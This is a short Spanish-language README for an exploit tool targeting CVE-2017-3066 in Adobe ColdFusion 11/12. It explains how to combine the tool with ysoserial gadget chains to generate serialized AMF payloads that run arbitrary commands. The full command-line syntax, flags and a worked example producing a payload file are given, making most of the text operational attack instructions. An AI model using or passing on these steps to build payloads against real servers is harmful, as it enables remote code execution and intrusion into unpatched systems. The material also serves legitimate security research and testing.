
Herramienta de explotación para CVE-2017-3066 dirigida a Adobe Coldfusion 11/12
Herramienta de explotación para CVE-2017-3066 dirigida a Adobe Coldfusion 11/12.
La herramienta permite generar payloads AMF serializados para explotar la validación de entrada faltante de clases permitidas. Para más detalles, consulte nuestro artículo en el blog.
Obtenga la última versión de ysoserial. Obtenga ColdFusionPwn desde lanzamientos.
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
- [-s|-e] Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type] ysoserial gadget payload
- [command] command to be executed
- [outfile] output file for the generated payload
Es necesario tener ColdFusionPwn-0.0.1-SNAPSHOT-all.jar como primera entrada en el classpath, ya que la biblioteca ApacheCommons BeanUtils incluida con ysoserial es más nueva (y tiene un uid de serialversion diferente).
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf